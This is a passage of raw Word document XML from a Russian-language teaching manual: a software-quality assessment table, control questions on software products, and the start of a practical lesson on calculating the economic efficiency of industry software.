            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="005324F4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Используется ли язык высокого уровня</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D2210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проверки корректности передаваемых данных</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Использование при построении программ метода структурного программирования</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Соблюдение принципа процесса разработки программы сверху вниз</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ограничений на размеры модуля</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модульной схемы программы</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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Всего</w:t>
            </w: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990861">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9656" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
          </w:tcPr>
          <w:p w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="005324F4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Оценочные элементы фактора «Корректность»</w:t>
            </w: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всех необходимых документов для понимания и использования ПС</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описание схемы иерархии модулей программы</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описаний основных функций</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описаний частных функций</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описания данных</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описания алгоритмов</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описания интерфейсов между модулями</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описания всех параметров</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 xml:space="preserve">Наличие описание методов </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>настройки системы</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описание способов проверки работоспособности программы</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Реанимация всех модулей системы</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Реанимация всех основных функций</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Реанимация всех алгоритмов</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определений всех данных: переменные, индексы, массивы и пр.</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Наличие интерфейсов с пользователем</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Отсутствие противоречий в выполнении основных функций</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Отсутствие противоречий в выполнении частных функций</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r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Отсутствие противоречий в выполнении алгоритмов</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4B402C" w:rsidP="005324F4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Правильность взаимосвязей</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4B402C" w:rsidP="004B402C">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Правильность реализаций интерфейса с пользователем</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4B402C" w:rsidP="005324F4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Отсутствие противоречий в настройке системы</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4B402C" w:rsidP="004B402C">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Комплектность документации в соответствии со стандартами</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pP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r w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="005324F4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidRDefault="004B402C" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Всего</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005324F4" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004B402C" w:rsidRPr="00617AC0" w:rsidRDefault="004B402C" w:rsidP="00776B59">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B6563" w:rsidRPr="00617AC0" w:rsidRDefault="004B6563" w:rsidP="004B6563">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B402C" w:rsidRPr="00617AC0" w:rsidRDefault="004B402C" w:rsidP="004B402C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Для чего предназначены программные продукты?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B402C" w:rsidRPr="00617AC0" w:rsidRDefault="004B402C" w:rsidP="004B402C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие варианты легального распространения программных продуктов существуют?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B402C" w:rsidRPr="00617AC0" w:rsidRDefault="004B402C" w:rsidP="004B402C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Чем определяется надежность ПП?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B402C" w:rsidRPr="00617AC0" w:rsidRDefault="004B402C" w:rsidP="004B402C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Как оценивается эффективность ПП?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B402C" w:rsidRPr="00617AC0" w:rsidRDefault="004B402C" w:rsidP="004B402C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Что обозначает модифицируемость ПП?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B402C" w:rsidRPr="00617AC0" w:rsidRDefault="004B402C" w:rsidP="004B402C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. На чем основана коммуникативность ПП?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0544" w:rsidRPr="00617AC0" w:rsidRDefault="009B080D" w:rsidP="005656CF">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc26278744"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 25 </w:t>
      </w:r>
      <w:r w:rsidR="00EE0544" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение эффективности использования программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w:rsidR="00EE0544" w:rsidRPr="00617AC0" w:rsidRDefault="00EE0544" w:rsidP="005656CF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">формирование навыков </w:t>
      </w:r>
      <w:r w:rsidR="005656CF" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>опредения эффективности программного продукта</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0544" w:rsidRPr="00617AC0" w:rsidRDefault="00EE0544" w:rsidP="005656CF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CF" w:rsidRPr="00617AC0" w:rsidRDefault="005656CF" w:rsidP="005656CF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Определение эффективности использования программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0544" w:rsidRPr="00617AC0" w:rsidRDefault="00EE0544" w:rsidP="005656CF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Экономический эффект от внедрения средств автоматизации может быть лишь косвенным, так как внедренные средства автоматизации не являются прямым источником дохода, а являются либо вспомогательным средством организации получения прибыли, либо помогают минимизировать затраты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оценить экономический эффект от использования программы можно двумя способами: простым и сложным (более трудоемкий способ, но более точный). Простой способ это некоторое упрощение сложного способа с учетом различных «оговорок». Например, если материальные затраты не меняются после внедрения программы, то их можно исключить из расчета, тем самым его упростив. Полная оценка по сложному алгоритму, как правило, проводится квалифицированными специалистами по итогам обследования бизнес-процессов </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>предприятия. Но если необходимо быстро и приблизительно оценить эффективность внедрения средства автоматизации, то можно в представленные формулы подставлять оценочные значения затрат. Конечно, при использовании оценок затрат, а не их фактических значений, экономический эффект будет посчитан не точно, но тем не менее позволит оценить выгодность и необходимость автоматизации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Главный экономический эффект от внедрения средств автоматизации заключается в улучшении экономических и хозяйственных показателей работы предприятия, в первую очередь за счет повышения оперативности управления и снижения трудозатрат на реализацию процесса управления, то есть сокращения расходов на управление. Для большинства предприятий экономический эффект выступает в виде экономии трудовых и финансовых ресурсов, получаемой от:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>снижения трудоемкости расчетов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>снижение трудозатрат на поиск и подготовку документов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>экономии на расходных материалах (бумага, дискеты, картриджи);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сокращения служащих предприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Снижение трудозатрат на предприятии возможно за счет автоматизации работы с документами, снижения затрат на поиск информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Критерием эффективности создания и внедрения новых средств автоматизации является ожидаемый экономический эффект. Он определяется по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Э=Эр-Ен*Кп,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где Эр - годовая экономия;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ен - нормативный коэффициент (Eн=0.15);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кп - капитальные затраты на проектирование и внедрение, включая первоначальную стоимость программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Годовая экономия Эр складывается из экономии эксплуатационных расходов и экономии в связи с повышением производительности труда пользователя. Таким образом, получаем:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эр=(Р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)+ΔРп,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где Р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и Р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
